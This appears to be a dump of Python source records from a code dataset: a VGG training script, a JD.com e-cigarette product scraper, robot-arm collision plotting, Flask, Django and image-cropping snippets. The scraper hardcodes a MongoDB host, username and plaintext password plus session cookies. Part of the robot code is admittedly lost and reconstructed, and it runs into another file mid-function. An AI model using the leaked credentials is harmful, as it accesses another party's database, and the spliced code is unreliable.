pipeline_counter=self._pipeline_counter or pipeline_counter,\n stage_name=self._stage_name or stage_name,\n stage_counter=self._stage_counter 
or stage_counter,\n job_name=self._job_name or job_name,\n name=name\n ),\n data={'value': value},\n headers={\n 'Accept': 'application/json',\n 'Confirm': 'true'\n },\n )\n return response.text\n","sub_path":"yagocd/resources/property.py","file_name":"property.py","file_ext":"py","file_size_in_byte":9572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"318064077","text":"__author__ = 'kanami'\nfrom torchvision import transforms,utils\nimport data_handler as dh\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport torch.utils.data as Data\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport math\nfrom torch.autograd import Variable\nEPOCHS = 1\nLR = 0.001\nBATCH_SIZE = 20\n# VGG network definition (VGG16-style with batch norm)\n\n\nclass VGGnet(nn.Module):\n def __init__(self,num_classes=1000,init_weights=True):\n super(VGGnet,self).__init__()\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_channels=3,out_channels=64,kernel_size=3,stride=1,padding=1),\n nn.BatchNorm2d(64),\n nn.ReLU(),\n )\n self.conv2 = nn.Sequential(\n nn.Conv2d(in_channels=64,out_channels=64,kernel_size=3,stride=1,padding=1),\n nn.BatchNorm2d(64),\n nn.ReLU(),\n nn.BatchNorm2d(64),\n nn.MaxPool2d(kernel_size=2) # (64,112,112) for a 224x224 input\n )\n self.conv3 = nn.Sequential(\n nn.Conv2d(64,128,3,1,1),\n nn.BatchNorm2d(128),\n nn.ReLU()\n )\n self.conv4= nn.Sequential(\n nn.Conv2d(128,128,3,1,1),\n nn.BatchNorm2d(128),\n nn.ReLU(),\n nn.BatchNorm2d(128),\n nn.MaxPool2d(2)\n )\n self.conv5 = nn.Sequential(\n nn.Conv2d(128,256,3,1,1),\n nn.BatchNorm2d(256),\n nn.ReLU()\n )\n self.conv6 = nn.Sequential(\n nn.Conv2d(256,256,3,1,1),\n nn.BatchNorm2d(256),\n nn.ReLU()\n )\n self.conv7 = nn.Sequential(\n nn.Conv2d(256,256,3,1,1),\n nn.BatchNorm2d(256),\n nn.ReLU()\n )\n self.conv8=nn.Sequential(\n nn.Conv2d(256,256,3,1,1),\n nn.BatchNorm2d(256),\n nn.ReLU(),\n nn.BatchNorm2d(256),\n nn.MaxPool2d(2)\n )\n self.conv9 = nn.Sequential(\n nn.Conv2d(256,512,3,1,1),\n nn.BatchNorm2d(512),\n nn.ReLU()\n )\n self.conv10 = nn.Sequential(\n nn.Conv2d(512,512,3,1,1),\n nn.BatchNorm2d(512),\n nn.ReLU()\n )\n self.conv11 = nn.Sequential(\n nn.Conv2d(512,512,3,1,1),\n nn.BatchNorm2d(512),\n nn.ReLU()\n )\n self.conv12 = nn.Sequential(\n nn.Conv2d(512,512,3,1,1),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.BatchNorm2d(512),\n nn.MaxPool2d(2)\n )\n self.conv13 = nn.Sequential(\n nn.Conv2d(512,512,3,1,1),\n nn.BatchNorm2d(512),\n nn.ReLU()\n )\n self.conv14 = nn.Sequential(\n nn.Conv2d(512,512,3,1,1),\n nn.BatchNorm2d(512),\n nn.ReLU()\n )\n self.conv15 = nn.Sequential(\n nn.Conv2d(512,512,3,1,1),\n nn.BatchNorm2d(512),\n nn.ReLU()\n )\n self.conv16 = nn.Sequential(\n nn.Conv2d(512,512,3,1,1),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.BatchNorm2d(512),\n nn.MaxPool2d(2)\n )\n self.classifier = nn.Sequential(\n nn.Linear(512*7*7,4096), # 512*7*7 = flattened feature map after five 2x poolings of a 224 input\n nn.BatchNorm1d(4096),\n nn.ReLU(),\n nn.Dropout(0.5),\n nn.Linear(4096,4096),\n nn.BatchNorm1d(4096),\n nn.ReLU(True),\n nn.Dropout(0.5),\n\n )\n self.out = nn.Linear(4096,num_classes)\n if init_weights:\n self._initialize_weights()\n def forward(self,x):\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.conv4(x)\n x = self.conv5(x)\n x = self.conv6(x)\n x = self.conv7(x)\n x = self.conv8(x)\n x = self.conv9(x)\n x = self.conv10(x)\n x = self.conv11(x)\n x = self.conv12(x)\n x = self.conv13(x)\n x = self.conv14(x)\n x = self.conv15(x)\n x = self.conv16(x)\n x =x.view(x.size(0),-1)\n x = self.classifier(x)\n output = self.out(x)\n #print(output.shape,'nnoutput')\n return output,x\n
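 # --- Size bookkeeping (editor's note, assuming the 224x224 RGB input produced by\n # transforms.Resize(224) further below): each of the five MaxPool2d(2) stages halves\n # the spatial side, 224 -> 112 -> 56 -> 28 -> 14 -> 7, so the flattened feature fed\n # to the classifier is 512 * 7 * 7 = 25088 values per image, matching the first\n # Linear layer above.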
 def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m,nn.Conv2d):\n # He/Kaiming-style init: std = sqrt(2/n) with n = the kernel's fan-out\n n = m.kernel_size[0]*m.kernel_size[1]*m.out_channels\n m.weight.data.normal_(0,math.sqrt(2./n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m,nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m,nn.Linear):\n m.weight.data.normal_(0,0.01)\n m.bias.data.zero_()\n\n# data loader\n\ndef default_loader(path):\n return Image.open(path).convert('RGB')\n\nclass MyDataset(Data.Dataset):\n def __init__(self,root='./data',train='train',transform=None,target_transform=None,loader=default_loader):\n self.imgs = []\n if train == 'train':\n self.X_train,self.y_train = dh.get_train_data(root)\n for i in range(self.y_train.shape[0]): # I've tried to get rid of this loop, but failed (see the index-based sketch below)\n self.imgs.append((self.X_train[i],self.y_train[i]))\n elif train =='test':\n self.X_test,self.y_test = dh.get_test_data(root)\n for i in range(self.y_test.shape[0]):\n self.imgs.append((self.X_test[i],self.y_test[i]))\n elif train =='valid':\n self.X_valid,self.y_valid = dh.get_valid_data(root)\n for i in range(self.y_valid.shape[0]):\n self.imgs.append((self.X_valid[i],self.y_valid[i]))\n self.transform = transform\n self.target_transform = target_transform\n self.loader = loader\n def __getitem__(self, item):\n # get the data and label from the index in the dataset\n data, label = self.imgs[item]\n \n img = Image.fromarray(data)\n\n if self.transform is not None:\n img = self.transform(img)\n return img,label\n def __len__(self):\n return len(self.imgs)\n\ntransform = transforms.Compose(\n [\n transforms.Resize(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225))\n ]\n)\n# The training images are already resized inside the data_handler helpers, but that is not the ideal place to do it.
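# --- Editor's sketch (illustrative; ArrayDataset is a hypothetical class that is not\n# part of the original file): the per-item list built in MyDataset.__init__ can be\n# avoided by indexing the parallel arrays lazily, assuming X is an array of HxWxC\n# images and y the matching labels, as returned by the data_handler helpers above.\nclass ArrayDataset(Data.Dataset):\n def __init__(self, X, y, transform=None):\n self.X, self.y, self.transform = X, y, transform\n def __getitem__(self, index):\n img = Image.fromarray(self.X[index]) # decode one sample on demand\n if self.transform is not None:\n img = self.transform(img)\n return img, self.y[index]\n def __len__(self):\n return len(self.y)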
#traindata = r'./data/train.txt'\nroot =r'./data'\n# train = {train,test,valid}\ntrain_dataset = MyDataset(root=root,train='train',transform=transform)\ntrain_loader =Data.DataLoader(\n dataset =train_dataset,\n batch_size=BATCH_SIZE,\n num_workers=2,\n)\n#testdata = './data/test.txt'\ntest_dataset = MyDataset(root=root,train='test',transform=transform)\ntest_loader = Data.DataLoader(\n dataset=test_dataset,\n batch_size=10,\n)\n\ndef show_batch(imgs):\n grid = utils.make_grid(imgs)\n plt.imshow(grid.numpy().transpose((1,2,0)))\n plt.title(\"Batch from dataloader\")\nif __name__=='__main__':\n #test_model\n my_vgg = VGGnet(num_classes=43)\n optimizer = torch.optim.Adam(my_vgg.parameters(),lr=LR)\n loss_func = nn.CrossEntropyLoss()\n for epoch in range(EPOCHS):\n #print(epoch)\n for step,(x,y) in enumerate(train_loader):\n #print(x.shape,y.shape)\n b_x = Variable(x)\n b_y = Variable(y.long())\n #print(b_x.shape,b_y.shape)\n output = my_vgg(b_x)[0]\n #print(\"type(b_y[0]):\",type(b_y[0]),'b_y.shape:',b_y.shape,'type(b_y)',type(b_y))\n #print(\"type(y[0]):\",type(y[0]),'b_y.shape:',y.shape,'type(y)',type(y))\n loss = loss_func(output,b_y)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if step%5 ==0:\n for step,(x_test,y_test) in enumerate(test_loader):\n if step>0:\n break\n x_test = Variable(x_test)\n y_test = Variable(y_test.long())\n test_output,last_layer = my_vgg(x_test)\n pred_v = torch.max(test_output,1)[1].data.squeeze()\n print(type(pred_v), pred_v.shape, type(y_test), y_test.shape)\n accuracy = sum(pred_v==y_test.long())/float(y_test.size(0))\n print('Epoch:',epoch,'|train loss:%.4f'%loss.data[0],'|test accuracy: %.2f'%accuracy)\n\n\n","sub_path":"vgg_bn.py","file_name":"vgg_bn.py","file_ext":"py","file_size_in_byte":8421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"149853309","text":"# -*- coding: utf-8 -*-\n# @Time : 2017/9/28 11:48\n# @Author : yanmin\n# @File : product.py\nimport requests\nimport json\nfrom urllib.parse import quote\nimport math\nfrom re import sub\nfrom common.logger import Logger\n# from common.mysql import Mysql\nimport time\nfrom common.IPProxy import IPlist\nimport random\nfrom pymongo import MongoClient\n\nconn = MongoClient(\"114.242.177.193\", 27017)\nbnu = conn.get_database(\"bnu_project\")\nbnu.authenticate(\"zjx\", \"ZhuJiaxing2018\")\n\nproduct_db = bnu.get_collection(\"jd_product\")\n\nnow_date = lambda: time.strftime(\"%Y-%m-%d %H:%M:%S\")\n# mysql = Mysql()\n# mysql.conn()\npattern = r\"'|\\\\\"\nlog = Logger(\"jd_product\", \"jd_product.log\")\ncookies = {\n 'cookie: JAMCookie': 'true',\n 'mobilev': 'html5',\n 'USER_FLAG_CHECK': 'd0a0e1294dbb3ee7639c0fc4a4781849',\n '__jdv': '122270672|direct|-|none|-|1506580800101',\n 'autoOpenApp_downCloseDate_auto': '1506580800329_1800000',\n 'sid': 'dc369f41127987913250a150e80a2dec',\n '__jda': '122270672.1506580800099930694922.1506580800.1506580800.1506580800.1',\n '__jdb': '122270672.3.1506580800099930694922|1.1506580800',\n '__jdc': '122270672',\n '__jdu': '1506580800099930694922',\n 'M_Identification': 'd57d4de9e7edc6bf_4ba841349035d62f75567a54a882415c',\n 'M_Identification_abtest': '20170928144009413_54593943',\n 'abtest': '20170928144103269_29',\n 'mba_muid': '1506580800099930694922',\n 'mba_sid': '15065808001028571604646666877.3',\n}\n\nheaders = {\n 'origin': 'https://so.m.jd.com',\n 'accept-encoding': 'gzip, deflate, br',\n 'x-requested-with': 'XMLHttpRequest',\n 'accept-language': 'zh-CN,zh;q=0.8',\n 'user-agent': 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Mobile Safari/537.36',\n 'content-type': 'application/x-www-form-urlencoded',\n 'accept': 'application/json',\n 'referer': 'https://so.m.jd.com/products/100001560-300015284-14228.html',\n 'authority': 'so.m.jd.com',\n}\n\n
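# --- Editor's aside (illustrative; strip_jsonp is a hypothetical helper that is not\n# part of the original script): the JD search endpoint answers with a JSONP-style\n# wrapper, which the requests below strip with the fixed slice .text[9:-2] before\n# json.loads. A slice-free alternative cuts between the first '(' and the last ')':\ndef strip_jsonp(body):\n start = body.index(\"(\") + 1\n end = body.rindex(\")\")\n return body[start:end]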
keywords = [\"电子烟\", \"烟油\", \"烟嘴\"]\n\n# category ids: 14228 = e-cigarettes, 14229 = e-liquid, 14231 = mouthpieces\n# categoryId = \"14229\"\ndef get_product(page, keyword):\n data = [\n ('keyword', quote(keyword)),\n ('datatype', '1'), # sort by sales volume\n ('page', page), # page the products are on, roughly 10 products per page (not certain)\n ('pagesize', '10'), # e-liquid subcategory\n ]\n res = requests.post('https://so.m.jd.com/ware/search._m2wq_list', data=data, headers=headers, cookies=cookies).text[9:-2]\n # print(res)\n content = sub(pattern, u\"’\", res)\n json_ob = json.loads(content)\n # print(json_ob)\n wareLists = json_ob['data']['searchm']['Paragraph']\n\n # the product name lives in the warename field\n for i in range(10):\n item = {}\n # print(wareLists)\n wareList = wareLists[i]\n item[\"productName\"] = wareList['Content']['warename']\n # product price\n item[\"price\"] = wareList['dredisprice']\n # product id\n item[\"productId\"] = wareList['wareid']\n # imageurl\n item[\"imageurl\"] = wareList['Content']['imageurl']\n # number of comments\n item[\"commentNum\"] = wareList['commentcount']\n # whether it is delivered by JD\n item[\"isDelivery\"] = wareList['sendService']\n # category\n item[\"categoryId\"] = wareList['catid']\n\n if (item[\"isDelivery\"] == True):\n item[\"isDelivery\"] = 1\n else:\n item[\"isDelivery\"] = 0\n\n product = product_db.find_one({\"productId\": item[\"productId\"]})\n # rows, res = mysql.get_one(\"select * from jd_product WHERE productId='%s'\" % productId)\n # # print res\n # # rows is the number of affected rows, res is the queried record\n # if rows == 0:\n if not product:\n # args = (\n # productId, productName, price, imageurl, commentNum, isDelivery, now_date(),categoryId)\n\n # sql = \"insert into jd_product(productId, productName, price, imageurl, commentNum, isDelivery,spiderTime,categoryId) VALUES('%s','%s','%s','%s','%s','%s','%s','%s')\" % args\n item[\"spiderTime\"] = now_date()\n try:\n product_db.insert_one(item)\n log.info(\"success insert item %s\" % (item[\"productId\"]))\n except:\n log.error(\"fail insert item %s,currentPage %s\" % (item[\"productId\"], page))\n\n # print(sql)\n # n = mysql.insert(sql)\n # if n == 1:\n # log.info(\"success insert item %s\" % (productId))\n # else:\n # print(sql)\n # log.error(\"fail insert item %s,currentPage %s\" % (productId, page))\n\n else:\n log.info(\"have insert productId:%s\" % (item[\"productId\"]))\n\n\ndef main(keyword):\n data = [\n # the search terms are e-cigarette, e-liquid and mouthpiece\n ('keyword', quote(keyword)),\n ('datatype', '1'), # sort by sales volume\n ('page', '1'), # page the products are on, roughly 10 products per page (not certain)\n ('pagesize', '10'), # e-liquid subcategory\n ]\n res = requests.post('https://so.m.jd.com/ware/search._m2wq_list', data=data, headers=headers, cookies=cookies).text[9:-2]\n # print(res)\n content = sub(pattern, u\"’\", res)\n json_ob = json.loads(content)\n # print(json_ob)\n wareLists = json_ob['data']['searchm']\n # totalNum holds the page count reported by the API\n totalNum = wareLists['Head']['Summary']['Page']['PageCount']\n PageCount = int(totalNum) + 1\n log.info(PageCount)\n for i in range(1, PageCount):\n print(i)\n get_product(i, keyword)\n time.sleep(random.randint(0, 5))\n\n\nif __name__ == \"__main__\":\n for keyword in keywords:\n log.info(keyword + \": \")\n main(keyword)\n 
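 # --- Editor's aside (illustrative, not in the original script): get_product\n # deduplicates with a find_one/insert_one pair, which can race if several\n # crawlers run at once; a single atomic alternative is a MongoDB upsert, e.g.\n # product_db.update_one({\"productId\": item[\"productId\"]}, {\"$setOnInsert\": item}, upsert=True)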
log.info(\"done!\")\n","sub_path":"jd_products.py","file_name":"jd_products.py","file_ext":"py","file_size_in_byte":5830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"307079150","text":"# This code represents the robot visualization ie., the movement of the robot in the given environment with fixed axis.\n\nimport numpy as np\nimport plotly.graph_objects as go\nfrom numpy import *\nfrom scipy.linalg import norm\n\n# global variables for cylinder and collision_line functions.\nstart_end = []\nradius = []\nstep_ = []\n\n\ndef plane(height):\n \n x= 500+np.linspace(0, 1000, 75)\n y= np.linspace(-800, 1000, 100)\n z= height*np.ones((5000,200))\n mycolorscale = [[0, '#aa9ce2'],\n [1, '#aa9ce2']]\n surf = go.Surface(x=x,y=y,z=z,colorscale = mycolorscale, showscale=False)\n fig.add_trace(surf)\n return fig\n \ndef JointLocations(thetas):\n \n d1 = 0.1625\n a2 = -0.425\n a3 = -0.3922\n d4 = 0.1333\n d5 = 0.0997\n d6 = 0.0996\n \n t1 = thetas[0]\n t2 = thetas[1]\n t3 = thetas[2]\n t4 = thetas[3]\n t5 = thetas[4]\n t23 = t2 + t3\n t234 = t2 + t3 + t4\n \n theta1 = [0,0,d1]\n \n theta2 = [(a2*np.cos(t1)*np.cos(t2)),\n (a2*np.cos(t2)*np.sin(t1)),\n (d1+(a2*np.sin(t2)))]\n \n theta3 = [np.cos(t1)*((a2*np.cos(t2)) + (a3*np.cos(t23))),\n ((a2*np.cos(t2)) + (a3*np.cos(t23))) *np.sin(t1),\n d1 + (a2*np.sin(t2))+(a3*np.sin(t23))]\n \n theta4 = [(np.cos(t1)*(a2*np.cos(t2)+a3*np.cos(t23)) + d4*np.sin(t1)),\n -d4*np.cos(t1) + ((a2*np.cos(t2)) + (a3*np.cos(t23)))*np.sin(t1),\n d1 + a2*np.sin(t2) + a3*np.sin(t23)]\n \n theta5 = [ d4*np.sin(t1) + (np.cos(t1) * ((a2*np.cos(t2)) + (a3*np.cos(t23)) + (d5*np.sin(t234)))),\n -d4*np.cos(t1) + (np.sin(t1) * ((a2*np.cos(t2)) + (a3*np.cos(t23)) + (d5*np.sin(t234)))),\n d1 - (d5*np.cos(t234)) + (a2*np.sin(t2)) + (a3*np.sin(t23))]\n \n theta6 = [((d4+(d6*np.cos(t5)))*np.sin(t1)) + np.cos(t1) * ((a2*np.cos(t2)) + (a3*np.cos(t23)) + (d5*np.sin(t234)) -(d6*np.cos(t234)*np.sin(t5))),\n (-np.cos(t1) * (d4+ (d6*np.cos(t5)))) + np.sin(t1) * ((a2*np.cos(t2)) + (a3*np.cos(t23)) + (d5*np.sin(t234)) - (d6*np.cos(t234)*np.sin(t5))),\n d1 - (d5*np.cos(t234)) + (a2*np.sin(t2)) + (a3*np.sin(t23)) - (d6*np.sin(t234)*np.sin(t5))]\n \n positions = [theta1,theta2,theta3,theta4,theta5,theta6]\n return positions\n\ndef SepPoints(data):\n xpoints = []\n ypoints = []\n zpoints = []\n\n for i in range(len(data)):\n xpoints.append((data[i][0]))\n ypoints.append((data[i][1]))\n zpoints.append((data[i][2]))\n \n return xpoints,ypoints,zpoints\n\ndef cylinder(r, h, a =0, nt=100, nv =50):\n theta = np.linspace(0, 2*np.pi, nt)\n v = np.linspace(a, a+h, nv )\n theta, v = np.meshgrid(theta, v)\n x = (r*np.cos(theta))\n y= (r*np.sin(theta))\n z = v\n return x, y, z\n\n\ndef Cylinder(pt1,pt2,r):\n step = 7\n data = go.Scatter3d(x=[pt1[0],pt2[0]], y=[pt1[1],pt2[1]], z=[pt1[2],pt2[2]],\n line = dict(width=50))\n fig.add_trace(data)\n \n v = subtract(pt2,pt1)\n mag = sqrt(v[0]**2 + v[1]**2 + v[2]**2)\n unit_v = [v[0]/mag, v[1]/mag, v[2]/mag]\n unit_v=asarray(unit_v)\n dist = sqrt((pt2[0]-pt1[0])**2 + (pt2[1]-pt1[1])**2 + (pt2[2]-pt1[2])**2)\n v1 = pt1\n v2 = pt2\n pdist = dist/step\n newpts_array = []\n for i in range(0, step):\n dist_v = pdist*unit_v\n newpts = pt1 + dist_v\n newpts_array.append(newpts)\n pt1 = newpts\n newpts=list(newpts)\n theta = linspace(0,2*np.pi,100)\n phi = linspace(0,np.pi,100)\n\n x = newpts[0]+r*outer(cos(theta),sin(phi))\n y = newpts[1]+r*outer(sin(theta),sin(phi)) \n z = newpts[2]+r*outer(ones(100),cos(phi))\n\n 
data=go.Surface(\n x=x,\n y=y,\n z=z,\n opacity=0.3\n )\n #fig.add_trace(data)\n\n nt = 100\n nv = 50\n mag_dist = norm(v)\n not_v=[1,0,0]\n \n if (unit_v == not_v).all():\n not_v = np.array([0, 1, 0])\n n1 = np.cross(unit_v, not_v)\n n1 /= norm(n1)\n n2 = np.cross(unit_v, n1)\n\n theta = np.linspace(0, 2*np.pi, nt)\n phi = linspace(0,np.pi,100)\n v = np.linspace(0, mag_dist, nv )\n rsample=np.linspace(0,r,2)\n rsample,theta = np.meshgrid(rsample,theta)\n theta1, v = np.meshgrid(theta, v)\n\n x,y,z = [v1[i] + unit_v[i] * v + r * np.sin(theta1) * n1[i] + r * np.cos(theta1) * n2[i] for i in [0, 1, 2]] \n \n \n cyl1 = go.Surface(x=x, y=y, z=z,\n showscale=False,\n opacity=0.5)\n \n\n start_end.append([v1,v2])\n radius.append(r)\n step_.append(step)\n return fig\n\n \ndef collision_line(p1,p2):\n data = go.Scatter3d(x=[p1[0],p2[0]], y=[p1[1],p2[1]], z=[p1[2],p2[2]])\n fig.add_trace(data)\n v_list = []\n for i in range(len(start_end)):\n newpts_array = []\n v = np.subtract(start_end[i][1],start_end[i][0])\n v_list.append(v)\n mag = norm(v)\n unit_v = [v[0]/mag, v[1]/mag, v[2]/mag]\n unit_v=asarray(unit_v)\n pt1 = start_end[i][0]\n pt2 = start_end[i][1]\n r = radius[i]\n step = step_[i]\n pdist = mag/step\n dist_array_ni = []\n dist_array = []\n\n for i in range(0,step):\n dist_v = pdist*unit_v\n #print(dist_v)\n newpts = pt1 + dist_v\n newpts_array.append(newpts)\n pt1 = newpts\n newpts=list(newpts)\n\n a = (p2[0]-p1[0])**2 + (p2[1]-p1[1])**2 + (p2[2]-p1[2])**2\n b = 2*((p2[0]-p1[0])*(p1[0]-newpts_array[i][0]) + (p2[1]-p1[1])*(p1[1]-newpts_array[i][1]) + (p2[2]-p1[2])*(p1[2]-newpts_array[i][2]))\n c = (newpts_array[i][0]**2 + newpts_array[i][1]**2 + newpts_array[i][2]**2 + p1[0]**2 + p1[1]**2 + p1[2]**2 - 2*(newpts_array[i][0]*p1[0] + \n newpts_array[i][1]*p1[1] + newpts_array[i][2]*p1[2]) - r**2)\n \n discriminant = b**2 - 4 * a * c\n if discriminant >= 0:\n x_1=(-b+sqrt(discriminant))/(2*a)\n x_2=(-b-sqrt(discriminant))/(2*a)\n else:\n x_1= complex((-b/(2*a)),sqrt(-discriminant)/(2*a))\n x_2= complex((-b/(2*a)),-sqrt(-discriminant)/(2*a))\n\n sol1 = [p1[0]*(1-x_2) + x_2*p2[0],\n p1[1]*(1-x_2) + x_2*p2[1],\n p1[2]*(1-x_2) + x_2*p2[2]] \n\n sol2 = [p1[0]*(1-x_1) + x_1*p2[0],\n p1[1]*(1-x_1) + x_1*p2[1],\n p1[2]*(1-x_1) + x_1*p2[2]]\n\n \n # NOTE: the comparison bodies in the branches below are reconstructed from a\n # garbled source span; the branch conditions follow the sphere/segment cases.\n if (discriminant < 0):\n dist1 = sqrt((newpts[0]-p1[0])**2 + (newpts[1]-p1[1])**2 + (newpts[2]-p1[2])**2) - r\n dist2 = sqrt((newpts[0]-p2[0])**2 + (newpts[1]-p2[1])**2 + (newpts[2]-p2[2])**2) - r\n if dist1<dist2:\n dist_array_ni.append(dist1)\n else:\n dist_array_ni.append(dist2)\n elif ((x_2>1 or x_2<0) and (x_1>1 or x_1<0)):\n dist1 = sqrt((newpts[0]-p1[0])**2 + (newpts[1]-p1[1])**2 + (newpts[2]-p1[2])**2) - r\n dist2 = sqrt((newpts[0]-p2[0])**2 + (newpts[1]-p2[1])**2 + (newpts[2]-p2[2])**2) - r\n if dist1 < dist2:\n dist_array_ni.append(dist1)\n else:\n dist_array_ni.append(dist2)\n elif (not(x_2 > 1 or x_2 < 0) and (x_1 > 1 or x_1 < 0)):\n dist1 = sqrt((sol1[0]-p1[0])**2 + (sol1[1]-p1[1])**2 + (sol1[2]-p1[2])**2)\n dist2 = sqrt((sol1[0]-p2[0])**2 + (sol1[1]-p2[1])**2 + (sol1[2]-p2[2])**2)\n if dist1 < dist2:\n dist_array.append(dist1)\n else:\n dist_array.append(dist2)\n elif ((x_2 > 1 or x_2 < 0) and not(x_1 > 1 or x_1 < 0)):\n dist1 = sqrt((sol2[0]-p1[0])**2 + (sol2[1]-p1[1])**2 + (sol2[2]-p1[2])**2)\n dist2 = sqrt((sol2[0]-p2[0])**2 + (sol2[1]-p2[1])**2 + (sol2[2]-p2[2])**2)\n if dist1 < dist2:\n dist_array.append(dist1)\n else:\n dist_array.append(dist2)\n# (a span of the source was lost here: the remainder of collision_line, the end of this\n# record and the beginning of the next record, src/datasets.py, are missing)\n if scores[i] > scores[idx_max]:\n idx_max = i\n box = boxes[idx_max]\n A, B, C, D = box\n \n def distance(A,B):\n x1, y1 = A\n x2, y2 = B\n dist = math.sqrt((x2 - x1)**2 + (y2 - y1)**2)\n return dist\n \n def findDirector(A, B):\n x1, y1 = A\n x2, y2 = B\n if x2-x1 == 0:\n return [0, 0, 1]\n slope = (y2-y1)/(x2-x1)\n cornet = math.atan(slope)/math.pi\n if -1/8.
< cornet < 1/8.: # horizontal-> maybe 0 or 180\n return [1, 0, 0] \n elif -3/8. <= cornet <= -1/8. or 1/8. <= cornet <= 3/8.: #diagonal\n return [0, 1, 0]\n elif -1/2. < cornet < -3/8. or 3/8. < cornet < 1/2.: #vertical 90 or 270\n return [0, 0, 1]\n if distance(A, B) > distance(A, D):\n return findDirector(A, B)\n else:\n return findDirector(A, D)\n \ndef main():\n pass\n \nif __name__ == \"__main__\":\n main() \n","sub_path":"src/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"310930931","text":"from flask import Flask,render_template\nfrom flask_socketio import SocketIO,emit\n\napp=Flask(__name__)\napp.config['SECRET_KEY']='mysecret'\nsocketio=SocketIO(app)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@socketio.on(\"submit vote\")\ndef vote(data):\n selection=data[\"selection\"]\n emit('announce vote',{\"selection\":selection},broadcast=True)\n\nif __name__==\"__main__\":\n socketio.run(app)","sub_path":"SocketIo/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"400219068","text":"from django.urls import path\nfrom offices.views import get_available_offices, book_now, save_booking, back_button, my_bookings,cancel_booking\n\n\napp_name = 'offices'\n\nurlpatterns = [\n path('', get_available_offices, name='ReservationFormView'),\n path('reserveNow////', book_now, name=\"book_now\"),\n path('doBooking////', save_booking, name=\"save_booking\"),\n path('backToHome/', back_button, name=\"back_to_homepage\"),\n path('myBookings/', my_bookings, name='my_bookings'),\n path('cancelBooking//', cancel_booking, name='cancel_booking')\n\n]\n","sub_path":"offices/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"108310686","text":"from muslimsoulmates.gallery.models import PhotoURL\nfrom muslimsoulmates.geographic.models import City\nfrom models import Message\nfrom django.db.models import Q\n\n\n\nclass Conversation(object):\n def __init__(self, *args, **kwargs):\n \"\"\"\n Get all messages that have been sent or received by this user. 
Provided the user has not 'deleted' them.\n \"\"\"\n self.user = kwargs.pop('user', None)\n #Get the message ids\n self.messages = Message.objects.filter(\n (Q(sender=self.user) & Q(sender_deleted=False)) |\n (Q(receiver=self.user) & Q(recipient_deleted=False)) \n ).values_list('id', flat=True)\n \n def get_correspondents(self):\n correspondents = []\n for message in self.messages:\n message = Message.objects.get(pk = message)\n if message.sender != self.user and message.sender not in correspondents:\n correspondents.append(message.sender)\n if message.receiver != self.user and message.receiver not in correspondents:\n correspondents.append(message.receiver)\n active_correspondents = [c for c in correspondents if c.is_active ]\n return active_correspondents\n \n","sub_path":"messages/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"150530012","text":"'''for i in file_list:\r\n image_dir = os.path.join(img_dir,i)\r\n image = Image.open(image_dir)\r\n img = image.crop((80,0,560,480))\r\n img.save(os.path.join(result_dir,i))\r\n'''\r\nimport os\r\nfrom PIL import Image\r\n# directory where the cropped images will be saved\r\nresult_dir = r\"C:\\Users\\YongTaek\\Desktop\"\r\n\r\n# image_dir is the path and file name of the 14x1 strip image.\r\ndef seperate(image_dir, result_dir=result_dir):\r\n # load the image\r\n img = Image.open(image_dir)\r\n\r\n # list to hold the tiles cut from the horizontally long image\r\n img_list = []\r\n\r\n # crop the image into the list at regular 256-pixel intervals.\r\n for i in range(14):\r\n img_list.append(img.crop((256*i,0,256*(i+1),256)))\r\n for i in range(14):\r\n #fin_image = cv2.resize(img_list[i],(512,512))\r\n fin_image = img_list[i]\r\n fin_image.save(os.path.join(result_dir,\r\n os.path.split(image_dir)[-1].split('.')[0] + '_'+ str(i) + '.jpg'))\r\n return 0\r\n\r\nseperate(r'C:\\Users\\YongTaek\\Desktop\\test8.jpg',result_dir=result_dir)\r\n\r\n ","sub_path":"PILcut.py","file_name":"PILcut.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"276701185","text":"\"\"\" Compiled: 2020-09-18 10:38:51 \"\"\"\n\n#__src_file__ = \"extensions/bdp_dashboard/BDPDashboard.py\"\n#----------------------------------------------------------------------------\n# (c) Copyright 2020 SunGard Front Arena. 
